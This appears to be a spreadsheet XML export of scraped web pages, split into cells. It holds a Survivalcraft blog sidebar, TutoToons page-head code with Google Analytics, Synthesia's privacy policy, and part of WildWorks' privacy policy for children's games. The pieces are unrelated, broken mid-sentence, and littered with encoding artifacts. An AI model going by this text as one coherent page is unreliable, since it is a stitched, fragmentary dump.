&lt;ul&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/survivalcraft-privacy-policy/" class="bump-view" data-bump-view="tp" aria-current="page"&gt;Survivalcraft Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/2022/07/11/more-2-3-bugfixes/" class="bump-view" data-bump-view="tp"&gt;More 2.3 bugfixes&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/media/" class="bump-view" data-bump-view="tp"&gt;Files/Technical&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/2017/05/23/multiple-players/" class="bump-view" data-bump-view="tp"&gt;Multiple players&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/updates-history/" class="bump-view" data-bump-view="tp"&gt;Updates History&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/2022/06/09/networking-issues/" class="bump-view" data-bump-view="tp"&gt;Networking issues&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/bugs-game/" class="bump-view" data-bump-view="tp"&gt;Bugs Game&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/2012/03/24/custom-texture-packs/" class="bump-view" data-bump-view="tp"&gt;Custom texture packs&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/2014/01/09/new-weapon-2/" class="bump-view" data-bump-view="tp"&gt;New weapon&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://kaalus.wordpress.com/faq/" class="bump-view" data-bump-view="tp"&gt;FAQ&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;
			&lt;/li&gt;
			&lt;li id="calendar-3" class="widget widget_calendar"&gt;
				&lt;h3 class="widgettitle"&gt;Posts Calendar&lt;/h3&gt;
&lt;div id="calendar_wrap" class="calendar_wrap"&gt;&lt;table id="wp-calendar" class="wp-calendar-table"&gt;
	&lt;caption&gt;April 2023&lt;/caption&gt;
	&lt;thead&gt;
	&lt;tr&gt;
		&lt;th scope="col" title="Monday"&gt;M&lt;/th&gt;
		&lt;th scope="col" title="Tuesday"&gt;T&lt;/th&gt;
		&lt;th scope="col" title="Wednesday"&gt;W&lt;/th&gt;
		&lt;th scope="col" title="Thursday"&gt;T&lt;/th&gt;
		&lt;th scope="col" title="Friday"&gt;F&lt;/th&gt;
		&lt;th scope="col" title="Saturday"&gt;S&lt;/th&gt;
		&lt;th scope="col" title="Sunday"&gt;S&lt;/th&gt;
	&lt;/tr&gt;
	&lt;/thead&gt;
	&lt;tbody&gt;
	&lt;tr&gt;
		&lt;td colspan="5" class="pad"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;2&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td&gt;3&lt;/td&gt;&lt;td&gt;4&lt;/td&gt;&lt;td&gt;5&lt;/td&gt;&lt;td&gt;6&lt;/td&gt;&lt;td&gt;7&lt;/td&gt;&lt;td&gt;8&lt;/td&gt;&lt;td&gt;9&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;td&gt;10&lt;/td&gt;&lt;td&gt;11&lt;/td&gt;&lt;td id="today"&gt;12&lt;/td&gt;&lt;td&gt;13&lt;/td&gt;&lt;td&gt;14&lt;/td&gt;&lt;td&gt;15&lt;/td&gt;&lt;td&gt;16&lt;/td&gt;
	&lt;/tr&gt;
	&lt;tr&gt;
		&lt;</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681341680"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681341680" id="stylescss"&gt;_x005F_x000D_
   &lt;script src="https://tutotoons.com/assets/js_new//spine-player.js"&gt;&lt;/script&gt;_x005F_x000D_
   &lt;script&gt;_x005F_x000D_
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){_x005F_x000D_
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),_x005F_x000D_
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)_x005F_x000D_
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');_x005F_x000D_
        ga('create', 'UA-45868014-1', 'tutotoons.com');_x005F_x000D_
        ga('send', 'pageview');_x005F_x000D_
        var global ={};_x005F_x000D_
         global.root_path = 'https://tutotoons.com/';_x005F_x000D_
   &lt;/script&gt;_x005F_x000D_
   &lt;script src="https://www.google.com/recaptcha/api.js" async defer&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
      &lt;!-- tutotoons.com/tutoclub only! --&gt;_x005F_x000D_
            &lt;!--</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en-us"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
   &lt;meta charset="utf-8" /&gt;_x005F_x000D_
   &lt;meta name="description" content="Synthesia is your piano tutor" /&gt;_x005F_x000D_
   &lt;meta name="keywords" content="synthesia,piano,keyboard,midi,song,sheet music,note,piano roll,player piano,piano game" /&gt;_x005F_x000D_
   &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
_ x000D_
   &lt;title&gt;Privacy and Legal&lt;/title&gt;_x005F_x000D_
   _x005F_x000D_
_x005F_x000D_
       &lt;script src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.8.3.min.js"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script src="//ajax.aspnetcdn.com/ajax/jquery.ui/1.12.1/jquery-ui.min.js"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script src="//ajax.aspnetcdn.com/ajax/jquery.validate/1.11.1/jquery.validate.min.js"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script src="//ajax.aspnetcdn.com/ajax/mvc/3.0/jquery.validate.unobtrusive.min.js"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script src="//ajax.aspnetcdn.com/ajax/mvc/3.0/jquery.unobtrusive-ajax.min.js"&gt;&lt;/script&gt;_x005F_x000D_
         &lt;link href="//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.min.css" rel="stylesheet"&gt;_x005F_x000D_
   &lt;style type="text/css"&gt;_x005F_x000D_
      * { margin: 0; }_x005F_x000D_
      body {_x005F_x000D_
         line-height: normal;_x005F_x000D_
         height: 100%;_x005F_x000D_
         background: #f3f3f3 none;_x005F_x000D_
         color: #353535;_x005F_x000D_
         padding: 0px;_x005F_x000D_
         font-family: Verdana,Helvetica,Arial,sans-serif;_x005F_x000D_
         font-size: 12px;_x005F_x000D_
      }_x005F_x000D_
_x005F_x000D_
      p, ul { line-height: 1.4em; margin:</t>
  </si>
  <si>
    <t>1em 0 1em 0; }_x005F_x000D_
_ x000D_
      h1 {_x005F_x000D_
         line-height: normal;_x005F_x000D_
         background: #d4e1ec;_x005F_x000D_
         font-family: Georgia, Times New Roman, Serif;_x005F_x000D_
         width: 910px;_x005F_x000D_
         height: 30px;_x005F_x000D_
         margin:</t>
  </si>
  <si>
    <t>40px 0 20px 0;_x005F_x000D_
         padding: 10px 10px 10px</t>
  </si>
  <si>
    <t>10px;_x005F_x000D_
         font-size: 24px;_x005F_x000D_
         font-weight: normal;_x005F_x000D_
         color: #017ab4;_x005F_x000D_
         clear: both;_x005F_x000D_
      }_x005F_x000D_
_x005F_x000D_
      img { border: 0; }_x005F_x000D_
      .emphasis { font-weight: bold; }_x005F_x000D_
_x005F_x000D_
      .header, .header a { color: White; text-decoration: none; }_x005F_x000D_
      .header a:hover { text-decoration: underline; }_x005F_x000D_
_x005F_x000D_
      .mainTitle { font-size: 54px; }_x005F_x000D_
      .readable { font-size: 18px; }_x005F_x000D_
      .serifFont { font-family: Georgia, Times New Roman, Serif; }_x005F_x000D_
_x005F_x000D_
      select { width: 350px; }_x005F_x000D_
_x005F_x000D_
      footer { display: flex; justify-content: space-evenly; width: 100%; margin: 0 0 2em 0; }_x005F_x000D_
      footer form { width: auto; padding: 0; margin: 0; }_x005F_x000D_
      span.spacer::before { content: "|"; color: cornflowerblue; }_x005F_x000D_
_x005F_x000D_
      button.btn-link {_x005F_x000D_
         line-height: normal;_x005F_x000D_
         vertical-align: baseline;_x005F_x000D_
         padding: 0;_x005F_x000D_
      }_x005F_x000D_
_x005F_x000D_
      .difficulty { border-radius: 4px; padding: 1px 2px; font-size: 7pt; margin: 1px; }_x005F_x000D_
      .d-easy { background-color: #dff0d8; color: #6a8f5a; border: 1px solid rgba(129, 174, 110, 0.5); }_x005F_x000D_
      .d-med { background-color: #ffeeba; color: #b48800; border: 1px solid rgba(189, 150, 31, 0.5); }_x005F_x000D_
      .d-hard { background-color: #f2dede; color: #ad5555; border: 1px solid rgba(173, 85, 85, 0.5); }_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
      hr.hr {_x005F_x000D_
         border: 0;_x005F_x000D_
         height: 0;_x005F_x000D_
         border-top: 1px solid rgba(0, 0, 0, 0.15);_x005F_x000D_
         border-bottom: 1px solid rgba(255, 255, 255, 0.5);_x005F_x000D_
         padding: 0; margin: 5px 0;_x005F_x000D_
      }_x005F_x000D_
   &lt;/style&gt;_x005F_x000D_
_x005F_x000D_
      &lt;style&gt;_x005F_x000D_
         .container {_x005F_x000D_
            padding-right: 15px;_x005F_x000D_
            padding-left: 15px;_x005F_x000D_
            margin-right: auto;_x005F_x000D_
            margin-left: auto;_x005F_x000D_
            display: block;_x005F_x000D_
         }_x005F_x000D_
_x005F_x000D_
         @media (min-width: 768px) { .container { width: 720px !</t>
  </si>
  <si>
    <t>important; } }_x005F_x000D_
         @media (min-width: 992px) { .container { width: 940px !important; } }_x005F_x000D_
         @media (min-width: 1200px) { .container { width: 1140px !important; } }_x005F_x000D_
_x005F_x000D_
      &lt;/style&gt;_x005F_x000D_
_x005F_x000D_
   &lt;link rel="shortcut icon" href="//www.synthesiagame.com/favicon.ico" type="image/vnd.microsoft.icon" /&gt;_x005F_x000D_
_x005F_x000D_
   &lt;style&gt;_x005F_x000D_
      h1 { width: auto; border-radius: 5px; }_x005F_x000D_
      dl &gt; dt, dl &gt; dd { padding-bottom: 8px; }_x005F_x000D_
_x005F_x000D_
      @media (max-width: 560px) { #h1WithLinks { margin: 0px 0 20px !</t>
  </si>
  <si>
    <t xml:space="preserve">important; } }_x005F_x000D_
      @media (max-width: 768px) { .readable { font-size: 14px; } }_x005F_x000D_
      @media (max-width: 610px) {_x005F_x000D_
         header { display: block; }_x005F_x000D_
         #navLinks { clear: both; margin-top: 90px; padding-top: 0px !important; }_x005F_x000D_
         h1 { margin: 17px 0 20px; font-size: 18px; }_x005F_x000D_
      }_x005F_x000D_
   &lt;/style&gt;_x005F_x000D_
_x005F_x000D_
   _x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body id="pagebody" style="background-image: url('//cdn.synthesia.app/images/headerContent.gif'); background-repeat: repeat-x;"&gt;_x005F_x000D_
_x005F_x000D_
   &lt;header class="container"&gt;_x005F_x000D_
	&lt;div class="header mainTitle serifFont" style="background-image: url('//cdn.synthesia.app/images/headerIcon.png'); background-repeat: no-repeat; padding-left: 10px; background-position: 8px 8px; top: 23px; text-indent: 52px; position: absolute;"&gt;&lt;a href="/" style="text-decoration: none;"&gt;Synthesia&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
   &lt;nav id="navLinks" class="nav header readable" style="padding-top: 44px; padding-right: 10px; text-align: right; word-spacing: 15px; white-space: nowrap;"&gt;_x005F_x000D_
      &lt;a href="/About"&gt;About&lt;/a&gt;_x005F_x000D_
      &lt;a href="/store"&gt;Songs&lt;/a&gt;_x005F_x000D_
      &lt;a href="/support"&gt;Support&lt;/a&gt;_x005F_x000D_
      &lt;a href="/keyboards"&gt;Keyboards&lt;/a&gt;_x005F_x000D_
   &lt;/nav&gt;_x005F_x000D_
&lt;/header&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
   &lt;main id="container" class="container"&gt;_x005F_x000D_
_x005F_x000D_
      _x005F_x000D_
&lt;h1&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
 &lt;p&gt;Last Modified December-13-2011&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class="readable serifFont"&gt;Privacy&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; The Synthesia website and the Synthesia application limit the collection of personally identifiable user data to purposes including but not limited to the following:&lt;/p&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
   &lt;li&gt;To enhance your experience.  </t>
  </si>
  <si>
    <t>Statistical information may be used in a variety of ways to improve the website or the game.&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;To solve technical problems.   Log data may be examined in the course of solving technical problems and in tracking down badly-behaved code or interactions.&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;To monitor website conditions.   We statistically sample raw log data from users' visits and activity to help maintain functionality of the website and related services.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class="readable serifFont"&gt;Release of Personally Identifiable Information&lt;/p&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>It is our policy that personally identifiable data collected in the server logs, or through records in the database, or through other non-publicly-available methods, may be released in any of the following situations:&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;ol&gt;_x005F_x000D_
   &lt;li &gt;In response to a valid subpoena or other compulsory request from law enforcement,&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;With permission of the affected user,&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;When necessary for investigation of abuse complaints,&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;Where the information pertains to a technical issue and its dissemination is necessary to illustrate or resolve it,&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;Where the user has been behaving in a disruptive way, data may be released to a service provider, carrier, or other third-party entity to assist in the targeting of IP blocks, or to assist in the formulation of a complaint to relevant Internet Service Providers,&lt;/li&gt;_x005F_x000D_
   &lt;li&gt;Where it is reasonably necessary to protect the rights, property or safety of Synthesia LLC, Synthesia, its users or the public.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class="readable serifFont"&gt;Disclaimer&lt;/p&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We believe that maintaining and preserving the privacy of user data is an important value. This Privacy Policy represents a committed effort to safeguard the security of the limited user information that is collected and retained on Synthesia servers. Nevertheless, we cannot guarantee that user information will remain private.</t>
  </si>
  <si>
    <t xml:space="preserve">We acknowledge that, in spite of our committed effort to protect private user information, determined individuals may still develop data-mining and other methods to uncover such information and disclose it. For this reason, we can make no guarantee against unauthorized access to information provided in the course of using the Synthesia website or the online features built into the Synthesia application itself.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;h1&gt;Affiliate Program Disclosure&lt;/h1&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class="readable serifFont"&gt;Amazon Associates&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Synthesia LLC is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to amazon.com.   As an Amazon Associate we earn from qualifying purchases.&lt;/p&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x005F_x000D_
_ x000D_
      &lt;p style="padding-bottom: 1em;"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
      &lt;footer class="header" style="clear:both; background-color: #0177b2; border-radius: 8px; width: 100%; text-align: center; margin-bottom: 10px; margin-top: 30px; padding: 10px 0;"&gt;_x005F_x000D_
         &lt;span&gt;&lt;/span&gt;_x005F_x000D_
         &lt;span&gt;&amp;copy; &lt;a href="/legal"&gt;Synthesia LLC&lt;/a&gt;&lt;/span&gt;_x005F_x000D_
         &lt;span class="spacer"&gt;&lt;/span&gt;_x005F_x000D_
         &lt;span&gt;&lt;a href="http://www.twitter.com/Synthesia"&gt;@Synthesia&lt;/a&gt;&lt;/span&gt;_x005F_x000D_
_x005F_x000D_
         &lt;span&gt;&lt;/span&gt;_x005F_x000D_
      &lt;/footer&gt;_x005F_x000D_
_x005F_x000D_
   &lt;/main&gt;_x005F_x000D_
_x005F_x000D_
   _x005F_x000D_
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
  &lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="minimal-ui, width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /&gt;
&lt;!-- fb open graph --&gt;
&lt;meta property="og:type" content="website" /&gt;
&lt;meta property="og:url" content="http://www.wildworks.com/" /&gt;
&lt;meta property="og:title" content="Fun with Substance" /&gt;
&lt;meta property="og:description" content="WildWorks is a gaming studio devoted to creating ridiculously fun games for kids, tweens, and teens. "/&gt;
&lt;meta property="og:image" content="http://www.wildworks.com/images/blinky_hero_og.jpg" /&gt;
&lt;!-- twitter card --&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:site" content="@playwildworks" /&gt;
&lt;meta name="twitter:title" content="Fun with Substance"&gt;
&lt;meta name="twitter:description" content="WildWorks is a gaming studio devoted to creating ridiculously fun games for kids, tweens, and teens." /&gt;
&lt;meta name="twitter:image" content="http://www.wildworks.com/images/blinky_hero_twitter.jpg" /&gt;
&lt;!-- favicons --&gt;
&lt;meta name="msapplication-tap-highlight" content="no" /&gt;
&lt;link rel="shortcut icon" href="/images/favicons/favicon.ico"&gt;
&lt;link rel="apple-touch-icon" sizes="57x57" href="/images/favicons/apple-touch-icon-57x57.png"&gt;
&lt;link rel="apple-touch-icon" sizes="114x114" href="/images/favicons/apple-touch-icon-114x114.png"&gt;
&lt;link rel="apple-touch-icon" sizes="72x72" href="/images/favicons/apple-touch-icon-72x72.png"&gt;
&lt;link rel="apple-touch-icon" sizes="144x144" href="/images/favicons/apple-touch-icon-144x144.png"&gt;
&lt;link rel="apple-touch-icon" sizes="60x60" href="/images/favicons/apple-touch-icon-60x60.png"&gt;
&lt;link rel="apple-touch-icon" sizes="120x120" href="/images/favicons/apple-touch-icon-120x120.png"&gt;
&lt;link rel="apple-touch-icon" sizes="76x76" href="/images/favicons/apple-touch-icon-76x76.png"&gt;
&lt;link rel="apple-touch-icon" sizes="152x152" href="/images/favicons/apple-touch-icon-152x152.png"&gt;
&lt;link rel="icon" type="image/png" href="/images/favicons/favicon-192x192.png" sizes="192x192"&gt;
&lt;link rel="icon" type="image/png" href="/images/favicons/favicon-160x160.png" sizes="160x160"&gt;
&lt;link rel="icon" type="image/png" href="/images/favicons/favicon-96x96.png" sizes="96x96"&gt;
&lt;link rel="icon" type="image/png" href="/images/favicons/favicon-16x16.png" sizes="16x16"&gt;
&lt;link rel="icon" type="image/png" href="/images/favicons/favicon-32x32.png" sizes="32x32"&gt;
&lt;meta name="msapplication-TileColor" content="#ee5a37"&gt;
&lt;meta name="msapplication-TileImage" content="favicons/mstile-144x144.png"&gt;
&lt;meta name="msapplication-config" content="favicons/browserconfig.xml"&gt;
&lt;!-- fonts --&gt;
&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Roboto:400,400italic,300italic,300,700italic,700" rel="stylesheet" type="text/css"&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Droid+Serif:700italic" rel="stylesheet" type="text/css"&gt;
&lt;title&gt;Privacy Policy | WildWorks &lt;/title&gt;
&lt;!-- Google Tag Manager --&gt;
&lt;script&gt;
  (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push(
  {'gtm.start': new Date().getTime(),event:'gtm.js'}
  );var f=d.getElementsByTagName(s)[0],
  j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
  'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
  })(window,document,'script','dataLayer','GTM-KZVL28L');
&lt;/script&gt;
&lt;script src="/js/head.min.js"&gt;&lt;/script&gt;
  &lt;link rel="stylesheet" href="/stylesheets/basicpage.css"&gt;
&lt;/head&gt;
&lt;body class="mobile"&gt;
  &lt;div class="main-container fineprint"&gt;
    &lt;header&gt;
      &lt;div class="bread-crumbs"&gt;
        &lt;a href="/index.html"&gt;home&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;span&gt;&lt;/span&gt; privacy policy
      &lt;/div&gt;
      &lt;h1&gt;Privacy Policy&lt;/h1&gt;
    &lt;/header&gt;
    &lt;div class="content-txt"&gt;
      &lt;p class="center-txt"&gt;&lt;strong&gt;WildWorks Inc.&lt;br&gt;
 Privacy Policy&lt;/strong&gt;&lt;/p&gt;
&lt;p class="update-date"&gt;
  Last Updated: &lt;strong&gt;March 31, 2021&lt;/strong&gt;
&lt;/p&gt;
 &lt;p&gt;WildWorks Inc. ("WildWorks") has developed this Privacy Policy to help you understand how we collect, use and disclose information we may collect from you and/or your device (computer, phone or other mobile device), or that you may provide to WildWorks while using our websites and apps, including but not limited to websites and mobile applications Tag with Ryan, Dash Tag, and Tunnel Town, as well as our website at WildWorks.com (collectively "WildWorks Services").&lt;/p&gt;
&lt;p&gt;Some of our websites and mobile applications are directed to children and adults.  </t>
  </si>
  <si>
    <t>A “child,” as it is used here is defined as a person under the age of 13 in the United States.   Other jurisdictions, such as European Union states, may define children differently. See also, 10.</t>
  </si>
  <si>
    <t>Children&lt;/p&gt;
&lt;p&gt; By using the WildWorks Services, you agree to how WildWorks collects, uses and discloses information that is collected from you. If you are under 18 years old, you acknowledge that your legal guardian has consented to this Privacy Policy.</t>
  </si>
  <si>
    <t>This Privacy Policy is an integral part of the Terms of Service governing your use of WildWorks Services.&lt;/p&gt;
&lt;p&gt;If you or your legal guardian do not accept or understand this Privacy Policy, please do not use the WildWorks Services.&lt;/p&gt;
&lt;h2&gt;1. Definitions&lt;/h2&gt;
&lt;ul&gt;The following defined terms shall have the meanings set forth below:
	&lt;li&gt;"Financial Information" means information relating to payments and billing (e.g., name, account information, billing address) provided by you. All Financial Information is collected for billing and payment purposes only and will be protected and administered by WildWorks and/or our authorized third party partners.&lt;/li&gt;
	&lt;li&gt;"Non-Personal Information" means information that, by itself, does not identify a specific individual or entity (e.g., demographic information, usage data or downloads).&lt;/li&gt;
	&lt;li&gt;"Personal Information" means specific identifiable information about an individual or entity which may be used to identify, contact or locate that person or entity (e.g., name, mailing address, Device ID (defined below), email address or phone number).&lt;/li&gt;
&lt;/ul&gt;
&lt;span&gt;Categories of information we collect:&lt;/span&gt;
&lt;table&gt;
	&lt;tbody&gt;
		&lt;tr&gt;
			&lt;th&gt;&lt;strong&gt;Category&lt;/strong&gt;&lt;/th&gt;
			&lt;th&gt;&lt;strong&gt;Examples&lt;/strong&gt;&lt;/th&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td&gt;Identifiers&lt;/td&gt;
			&lt;td&gt;Real name, username, email address, Internet Protocol (IP) Address, or similar identifiers&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td&gt;Commercial Information&lt;/td&gt;
			&lt;td&gt;Records of past purchases made through our services&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td&gt;Usage&lt;/td&gt;
			&lt;td&gt;Records of usage and activities within the games, such as minigames played, rewards earned, items acquired, and similar usage logging&lt;/td&gt;
		&lt;/tr&gt;
		&lt;tr&gt;
			&lt;td&gt;Geolocation Data&lt;/td&gt;
			&lt;td&gt;Physical location, insofar as it can be inferred from your IP Address&lt;/td&gt;
		&lt;/tr&gt;
	&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;See below for more specific details concerning the information we collect, why we collect it, how it’s used, and your rights with regard to your information.&lt;/p&gt;
&lt;h2&gt;2.</t>
  </si>
  <si>
    <t>What Information Is Collected?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Information You Provide.&lt;/strong&gt; WildWorks may receive and store any Personal Information, Financial Information and/or Non-Personal Information that you provide when you interact with WildWorks. Some features and/or functionality of the WildWorks Services may be unavailable if you choose not to share certain information. WildWorks may use information you provide to communicate with you and to improve the WildWorks Services.</t>
  </si>
  <si>
    <t>Here are some examples:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Email Communications.&lt;/strong&gt; If you contact us via email, WildWorks may use your Personal Information to send you emails related to promotions and/or events. You can opt out of receiving promotional emails by following the instructions in the relevant correspondence.</t>
  </si>
  <si>
    <t>Once WildWorks has processed your opt-out request, WildWorks will not send you further promotional emails unless you later opt back in. Whether you opt out of receiving promotional emails or not, WildWorks reserves the right to email you with respect to important account information, notices or changes relating to the WildWorks Services.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Contact Us.&lt;/strong&gt; If you choose to use our "Contact Us" or “Help” forms you may be asked to provide Personal Information and describe the purpose for which you are contacting WildWorks.</t>
  </si>
  <si>
    <t>If WildWorks is aware that you are under the age of 13, WildWorks will delete your email address once your request has been fulfilled.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Geo-Location Data.&lt;/strong&gt; WildWorks does not ask you for or track any device-generated location information at any time while downloading or using WildWorks' mobile applications or services, but other information collected, such as an IP Address, may correspond to your country of origin.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Push Notifications.&lt;/strong&gt; On occasion, WildWorks will send you push notifications when using WildWorks' mobile applications to alert you to in-game events or provide other account information that may be important to you. If you no longer wish to receive these types of communications, you may opt-out from receiving them by turning them off at the device level through the notification settings of your mobile device.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Other Information.&lt;/strong&gt; You may provide other Personal and Non-Personal information whenever you interact with the WildWorks Services, including, without limitation, when you search the WildWorks Services, participate in a contest, survey or questionnaire, place an order, or communicate with WildWorks by phone or email.&lt;/p&gt;
	&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With any of the above actions, you may supply WildWorks with information such as your name, address, phone number, alternate contact information, information about your use of the WildWorks Services, personal descriptions and product descriptions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Information Collected Automatically or Through Technology.&lt;/strong&gt; WildWorks may receive and store certain Personal Information and Non-Personal Information whenever you interact with WildWorks.</t>
  </si>
  <si>
    <t>While you are able to visit the WildWorks Services and remain anonymous, WildWorks and/or WildWorks' third-party service providers may still collect Personal and Non-Personal Information through technological means. Such information may be gathered by the following methods:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Tracking.&lt;/strong&gt; Technologies such as cookies, beacons, tags and scripts are used by us and our partners, affiliates, and service providers. These technologies are used in analyzing trends, administering the site, tracking user movements around the site or service, and to gather demographic information about our users in aggregate.</t>
  </si>
  <si>
    <t>We may receive reports based on the use of these technologies by these companies on an individual as well as aggregated basis.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Device Information.&lt;/strong&gt; When you download and use the WildWorks Services, WildWorks automatically collects information on the type of device you use, operating system, application version, and the persistent device identifier assigned to your device by its manufacturer ("Device ID"). You consent to WildWorks collecting this information.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Metadata.&lt;/strong&gt; “Metadata” is data collected and used to facilitate the WildWorks Services, monitor system usage, prevent fraud, and for other services.</t>
  </si>
  <si>
    <t>Some examples of metadata that WildWorks may collect and analyze include, without limitation, the Internet protocol (IP) address used to connect your computer to the Internet, computer and connection information (such as browser type, version, and time zone setting, browser plug-in types and versions, operating system, and platform), the full Uniform Resource Locator (URL) click sequence to, through, and from the WildWorks Services, including date and time, cookie number and any products, services or features you use or interact with arising out of or in connection with your use of the WildWorks Services.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Log files.&lt;/strong&gt; As most websites do, WildWorks gathers certain information automatically and stores it in log files. This information may include internet protocol (IP) addresses, browser type, internet service provider (ISP), referring/exit pages, operating system, date/time stamp, and/or clickstream data.&lt;/p&gt;&lt;/li&gt;
	&lt;li&gt;&lt;p&gt;&lt;strong&gt;Tools.&lt;/strong&gt; WildWorks may use software tools to measure and collect information about your use of the WildWorks Services, including, without limitation, page response times, upload and file transfer errors, interaction information (such as scrolling, clicks, and mouse- overs), features use, purchase tracking and order fulfillment and methods.</t>
  </si>
  <si>
    <t>Sometimes, you will have a choice whether or not to provide information, but if you fail to provide certain information it could impact some features and/or functionalities of the WildWorks Services.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Information from Other Sources.&lt;/strong&gt; WildWorks may receive information about you from WildWorks' third-party service providers, or other sources such as purchase or redemption information, WildWorks Services usage, payment information, reporting information, page-view information, technical, fulfillment, advertising, and search information.&lt;/p&gt;
